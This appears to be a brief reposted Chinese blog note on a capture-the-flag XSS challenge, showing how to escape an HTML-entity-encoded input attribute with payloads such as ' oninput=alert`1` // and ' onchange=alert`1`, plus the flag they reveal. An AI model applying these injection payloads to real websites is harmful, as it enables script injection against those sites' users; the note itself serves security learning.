xss实体绕过示例
作者:互联网
知识点:
倘若是在script、input标签当中,即可突破。
Payload
使用xss实体绕过即可突破,
先输入 ' oninput=alert`1` // 提交,
在input中输入内容时触发事件,输入数字1即触发xss弹窗,
获得flag{Network_security_Era}
' oninput=alert`1` // 当要在input中输入内容时触发事件
' oninput=alert`1` ' 同上
' onchange=alert`1` // 发生改变的时候触发该事件
' onchange=alert`1` ' 同上在script里直接alert 示例: 首选输入测试语句<script>alert(/Micr067/)</script>, 查看源码发现做了实体编码。
标签:xss,oninput,触发,示例,alert,input,绕过,输入 来源: https://www.cnblogs.com/micr067/p/11396201.html